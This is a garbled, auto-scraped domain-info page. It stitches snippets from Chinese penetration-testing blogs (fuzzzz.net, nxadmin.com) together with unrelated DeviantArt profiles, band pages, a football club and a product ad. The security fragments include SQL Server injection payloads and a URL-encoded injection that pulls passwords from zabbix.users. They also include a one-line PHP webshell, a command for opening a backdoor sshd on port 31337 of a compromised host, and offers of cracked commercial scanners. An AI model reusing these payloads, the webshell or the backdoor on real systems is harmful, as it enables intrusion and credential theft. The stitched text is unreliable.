fuzzzz.net
Sudo's BLoG.为了梦想 Fighting !Sudo的个人博客
http://www.fuzzzz.net/
Sudo的个人博客
http://www.fuzzzz.net/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Tuesday
LOAD TIME
ming jia
ming jia
be●●ng , 100000
CN
View this contact
jia ming
jia ming
hacker●●●●●●ack me
be●●ng , 100000
CN
View this contact
jia ming
jia ming
hacker●●●●●●ack me
be●●ng , 100000
CN
View this contact
BUY YOUR DOMAIN
10
YEARS
5
MONTHS
11
DAYS
SHANGHAI YOVOLE NETWORKS INC.
WHOIS : ewhois.sundns.com
REFERRED : http://www.sundns.com
PAGES IN
THIS WEBSITE
20
SSL
EXTERNAL LINKS
25
SITE IP
0.0.0.0
LOAD TIME
0 sec
SCORE
6.2
Sudo's BLoG.为了梦想 Fighting ! | fuzzzz.net Reviews
https://fuzzzz.net
Sudo的个人博客
fuzzzz.net
WordPress 3.0-3.92 存储型XSS漏洞分析&POC – SudoHac's BLoG.
http://fuzzzz.net/coding/282.html
你的位置 SudoHac's BLoG. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 问题出在wordpress的留言处,通常情况下留言是允许一些html标签的,比如 a 、 B 、 code 等等,然后标签中有一些属性是在白名单里的,比如 a 标签允许href属性,但是onmouseover属性是不允许的。 但是在一个字符串格式化函数wptexturize()上出现了问题,这个函数会在每一个留言上执行,函数的功能是把当前的字符转义成html实体,比如把 转义为“”。 Textarr = preg split('/( .* [.* ])/Us', $text, -1, PREG SPLIT DELIM CAPTURE);. A href="xxx" title="]" /a ["! XSS a /a ]. Function wptexturize($text) { return $text; / 加入这一行 global $wp cockneyreplace;. 转载请注明 SudoHac's BLoG. Siteserver 3.6.3版SQL注入漏洞.
SudoHac – SudoHac's BLoG.
http://fuzzzz.net/author/root
前几天vBulletin官方论坛被黑,随后一个叫Coldzer0的小哥在1337day上卖vBulletin 5全版本的RCE 0day,看演示很厉害,指哪打哪。 今天我们的威胁情报系统显示知名的web漏洞扫描器AWVS 10被爆出一个本地权限提升漏洞,漏洞详情及POC https:/ www.exploit-db.com/exploits/38847/ 漏洞分析 根据作者的描述,问题是出现在AWVS 10 . 写在前面的话 你是否喜欢漂亮妹子 & am. 最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. Какие виды камня используются для изгото. 2017 SudoHac's BLoG.
SudoHac's BLoG.为了梦想 Fighting !-Page 4
http://fuzzzz.net/page/4
SudoHac's BLoG.为了梦想 Fighting! OpenSSL “heartbleed” 信息泄漏漏洞. PHP Safemode & Disable function Bypass [Linux]. 对于Linux提权 如果shell传上去 发现是php开启了安全模式或者禁用了exec system shell exec等等常用的执行命令函数,导致我们无法执行系统命令,可以尝试一下方法绕过 1.安全模式只是对于PHP,所以传一个其他语言的shel. 据我所知,在这个庞大的区域,没有一个 神奇 的答案.分享,共享 我的出发点。 0 00 目录 0x01 链接的构成 0x02 浏览器算如何对url进行解析的 0x03 链接真的只能是这样固定的格式么 0x04 链接真的是你看到的那样么 0 01 链接的构成 链接真的只能固定成我们常用的格式么 不知. 出自 FreebuF.COM 作者 LittleHann 这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。 Какие виды камня используются для изгото.
工具 – SudoHac's BLoG.
http://fuzzzz.net/category/tools
老外的开源应用 https:/ github.com/sensepost/reGeorg 非常方便,不用管操作系统,直接传shell上去,然后本. IBM appscan 9.0破解版分享. 最近工作需要安装appscan 但是最新版9.0的网上一直找不到破解版 最终从某大牛那里得到。 非本人破解,只是分享 简介 IBM AppScan该产品是一个领先的 Web 应用安全测试工具,曾以 Watchfire AppScan 的名称享. Php $a=$ GET['a'];$a($ POST['cmd']);? 纯GET POST组成的一句话 链接地址 http:/ www.xxxx.com/shell.p. OpenSSL “heartbleed” 信息泄漏漏洞. Burpsuite pro v1.5.18 破解版. Какие виды камня используются для изгото. 2017 SudoHac's BLoG.
SQL Server手工注入-显错注入 – SudoHac's BLoG.
http://fuzzzz.net/pentest/263.html
你的位置 SudoHac's BLoG. 8212;————————————获取基本信息————————————-. And exists (select * from sysobjects) -. And exists (select count(*) from sysobjects) - / 效率更高. Select count(*) from sysobjects-. And 1=(@ servername%2b' '%2bhost name() -. And 1=(Select count(*) FROM master.sysobjects Where xtype = 'X' AND name = 'xp cmdshell') -. And 1=(select count(*) FROM master.sysobjects where name= 'xp regread')-. And 1=quotename(db name() -. And 1=db name() %2b' '-. And 1=(select IS SRVRpreEMEMBER('sysadmin') - / 返回正常为sa.
TOTAL PAGES IN THIS WEBSITE
20
Links - 40huo's
https://www.40huo.cn/links.html
Across the Great Wall. February 25th, 2017 at 01:39 pm. 独立博客资源导航 http:/ blog.yiyeti.cc/ 已收录该站 特此告知.
Win server 2003/08 | 阿德马Web安全
http://www.nxadmin.com/category/system/winserver
分类目录归档 Win server 2003/08. Php后门木马常用的函数大致上可分为四种类型 1. 执行系统命令: system, passthru, shell exec, exec, popen, proc open . 作者 NP 老文章转载 我们来谈下提权前的, WIN系统 服务器内部信息探测 因为现在机器基本上都是2K3以上了,所以我们的话题主要围绕2K3谈 我们拿到一个低权限的WEBSHELL后,一般都是先探测服务器内部信息,以找到可以提权的条件或桥梁。 中国电信公司windows操作系统安全配置指南是中国电信公司网络运营维护事业部的基本系统安全配置规范.此文档包括了数据库(mysql,mssql),操作系统(windows server 2003,linux),应用中间件(IIS,apache,Tomcat)等的基本安全配置和安全加固的方法,以及注. 一、帐户登录事件 下面显示了由 审核帐户登录事件 安全模板设置所生成的安全事件。 672 已成功颁发和验证身份验证服务 (AS) 票证。 解决]Unable to find image ‘xxx’ locally.
Linux/Unix | 阿德马Web安全
http://www.nxadmin.com/category/system/linux-system
1ssh -V #查看当前的ssh版本信息 #OpenSSH 5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2.查找ssh的配置文件 一般都在/etc/ssh中 3.备份原来的文件的time 将/etc/ssh下的文件的备份 假设/etc/ssh/sshd config 备份为/etc/ssh/sshd config.old. 本文由Sky原创投稿,请尊重劳动成果,转载注明出处 测试环境 Centos 6.2 64位 0x01:查询本机的PAM版本 下载地址 http:/ www.linux-pam.org/library/ https:/ fedorahosted.org/rel. 作者 Sky yakexi009@gmail.com 1.PAM工作流程 2.PAM 配置文件语法 module-type control-flag module path optional 在/etc/pam.d/下的文件中,与服务名称相对应的文件,为该. 本文例举了十大PHP最佳安全实践方式,能够让您轻松、安全配置PHP. PHP安全性设置提示 DocumentRoo.
Centos修改mysql密码 | 阿德马Web安全
http://www.nxadmin.com/system/1340.html
启动成功后查看mysql进程信息, 获取 mysqld safe. Ps -ef grep -i mysql. Root 3466 1 0 01:45 pts/1 00:00:00 /bin/sh /usr/bin/mysqld safe. 8211;datadir=/var/lib/mysql –pid-file=/var/lib/mysql/BSC.TEST.pid. Mysql 3569 3466 16 01:45 pts/1 00:00:00 /usr/sbin/mysqld –basedir=/usr –datadir=/var/lib/mysql –plugin-dir=/usr/lib64/mysql/plugin –user=mysql –log-error=/var/lib/mysql/BSC.TEST.err –pid-file=/var/lib/mysql/BSC.TEST.pid. Root 3597 3105 0 01:45 pts/1 00:00:00 grep -i mysql. 可以看到mysqld safe的安装位置 上面标蓝色部分 /usr/bin/.
系统加固 | 阿德马Web安全
http://www.nxadmin.com/category/system
解决]Unable to find image ‘xxx’ locally. 阿里云的VPS,安装的是镜像市场中的Docker运行环境 Ubuntu 64位 系统,用docker pull镜像的时候会报错,具体错误如下 Unable to find image 'busybox' locally Pulling repository registry 2016/08/24 16:29:53 Could not reach any registry endpoin. Could not reach any registry endpoint. Unable to find image. 解决]error: editline/readline.h: No such file or directory. 最近用django开发小东西,用的测试机是其它离职小伙伴的,不知道mysql密码,百度到下面的文章,亲测成功,分享出来 本人在CentOS 6.4上安装万mysql后,无法通过root进入,因为安装的时候,并没有设置root密码,似乎有个初始随机密码,但是不记得了,太麻烦,直接重置root密码。 本文由Sky...
Java代码审计基础(一) | 阿德马Web安全
http://www.nxadmin.com/web/1332.html
Page import=java.sql.*% %@ page language=java contentType=text/html; charset=ISO-8859-1 pageEncoding=ISO-8859-1%! Page import=java.sql.*% %@ page language=java contentType=text/html; charset=ISO-8859-1 pageEncoding=ISO-8859-1%! DOCTYPE html PUBLIC -/ W3C/ DTD HTML 4.01 Transitional/ EN http:/ www.w3.org/TR/html4/loose.dtd html head meta http-equiv=Content-Type content=text/html; charset=ISO-8859-1 title /title /head body % String user = request.getParameter(user); String pass = reques...DOCTYPE html PUBL...
Other | 阿德马Web安全
http://www.nxadmin.com/category/system/other
Web服务器IIS,Apache,Nginx等应用的安全加固,以及Mysql和Mssql数据库安全加固技巧分享. 解决]Unable to find image ‘xxx’ locally. 阿里云的VPS,安装的是镜像市场中的Docker运行环境 Ubuntu 64位 系统,用docker pull镜像的时候会报错,具体错误如下 Unable to find image 'busybox' locally Pulling repository registry 2016/08/24 16:29:53 Could not reach any registry endpoin. Could not reach any registry endpoint. Unable to find image. 解决]error: editline/readline.h: No such file or directory. 解决 ImportError: pycurl: libcurl link-time ssl backend (openssl). 一般情况都是这个目录 2,配置 ROOT WEB-INF we.
Fofa搜索结果采集及漏洞利用小脚本 | 阿德马Web安全
http://www.nxadmin.com/tools/1344.html
Http:/ zone.wooyun.org/content/17971. Coding:utf-8 import urllib2,urllib,cookielib import re,sys import base64 import os,json def vulwebsearch(keywords): vulhostlist=[] urlenkeywords=urllib2.quote(keywords) searchurl=http:/ fofa.so/api/result? Applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20inform...
TOTAL LINKS TO THIS WEBSITE
25
FuzzzyDice (Jacob Jones) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) " class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 1 Year. This deviant's full pageview. November 18, 1996. Last Visit: 13 weeks ago. This is the place where you can personalize your profile! By moving, adding and personalizing widgets. May 4, 2015.
fuzzzydicesbandcamp.bandcamp.com
FuzzzyDice
Includes high-quality download in MP3, FLAC and more. Paying supporters also get unlimited streaming via the free Bandcamp app. Please Do Come Again! Released June 1, 2014. Feeds for this album. Stuff And Stuff And Stuff. Switch to mobile view.
The Fuzzy Lemons - Family-friendly Rock and Roll
Join Our Mailing List. Get ready to jump, wiggle, and shake with The Fuzzy Lemons, the juiciest family-friendly rock band on the scene! With laugh-out-loud lyrics and memorable melodies, every song tells a story and every show is full of fun, inspiring kids of all ages to dance and sing along with music the whole family will love! Interested in booking the Fuzzy Lemons for an upcoming birthday party or special event? For info on our full-band and acoustic trio packages.
FuzzzyTail (Kris) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Icon By ` Moxiv. Digital Art / Student. Deviant for 3 Years. This deviant's full pageview. Last Visit: 1 day ago. Icon By ` Moxiv. Ok This is g...
Fuzzzy Truth
Thursday, June 2, 2011. Are Americans being lied to, misled, duped (and doped) by those we elect to lead and guide us? Check out this link, this fella has some very profound insights to share. Http:/ adask.wordpress.com/category/god-given/. Sunday, May 29, 2011. What is the Truth? Throughout recorded time, Truth has been defined based on the Holy Bible. Subscribe to: Posts (Atom). Wilmington, NC, United States. View my complete profile.
Sudo's BLoG.为了梦想 Fighting !
WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口. 8212;————————————获取基本信息————. Bash漏洞为什么能够执行 Bash漏洞的原理 BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 老外的开源应用 https:/ github.com/sensepost/reGeorg 非常方便,不用管操作系统,直接传shell上去,然后本. 看见乌云上有个类似的漏洞 便研究了一下,发现类似的漏洞存在不少 比如这个 SKY网络电话。 WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 2015 Sudo's BLoG.
fuzzzzzz (Nicolas K) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) " class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 5 Years. This deviant's full pageview. March 22, 1979. Last Visit: 180 weeks ago. This is the place where you can personalize your profile! By moving, adding and personalizing widgets. Jul 1, 2010.
fv--good-sentence--vf.skyrock.com
Blog de fv--good-sentence--vf - Blog de fv--good-sentence--vf - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. Blog de fv- good-sentence- vf. Lache tes com's. Mise à jour :. Abonne-toi à mon blog! N'oublie pas que les propos injurieux, racistes, etc. sont interdits par les conditions générales d'utilisation de Skyrock et que tu peux être identifié par ton adresse internet (67.219.144.170) si quelqu'un porte plainte. Ou poster avec :. Retape dans le champ ci-dessous la suite de chiffres et de lettres qui apparaissent dans le cadre ci-contre. Ou poster avec :. N'oublie ...
Fussball in Bad Soden: FV 08 Neuenhain e.V., Bad Soden a.Ts. - FV 08 Neuenhain e.V. - Bad Soden a.Ts.
Fußballverein 1908 Neuenhain e.V. Fußballverein 1908 Neuenhain e.V. Wir für die Jugend. 08er Partner and Sponsoren. Herzlich Willkommen beim FV 08 Neuenhain. FV 08 Neuenhain e.V. Diese Homepage wurde mit 1&1 MyWebsite.
Portada | FV-101.org
Soluciones informáticas a medida. Bienvenidos a FV-101.org. FV-101.org se dedica al diseño, suministro, instalación y mantenimiento de infraestructuras informáticas y de comunicaciones, tanto para particulares, profesionales y empresas en el teritorio de Fuerteventura. Internet compartido - Redes Wireless Mesh. Comparte tú conexión ADSL entre amigos o vecinos, recorta los gastos de internet con el fin de proveer acceso a bajo coste a través de la tecnología inalambrica. ( Leér más.
>>>>>>>>>>>>!!!!!!!### Check FV-11VHl2 by PANASONIC
Check FV-11VHl2 by PANASONIC. Wednesday, March 23, 2011. Save 46% on Panasonic FV-11VHL2 WhisperWarm 110 CFM Ceiling Mounted Fan/Heat/Light/Night-Light Combination. Panasonic FV-11VHL2 WhisperWarm 110 CFM Ceiling Mounted Fan/Heat/Light/Night-Light Combination. 8226; Compare Prices •. 8226;•• See Best Price •••. Panasonic FV-11VHL2 WhisperWarm 110 CFM Ceiling Mounted Fan/Heat/Light/Night-Light Combination Feature. Rated 110 cubic feet per minute. Usually ships in 1-2 business days. I bought the first one ...
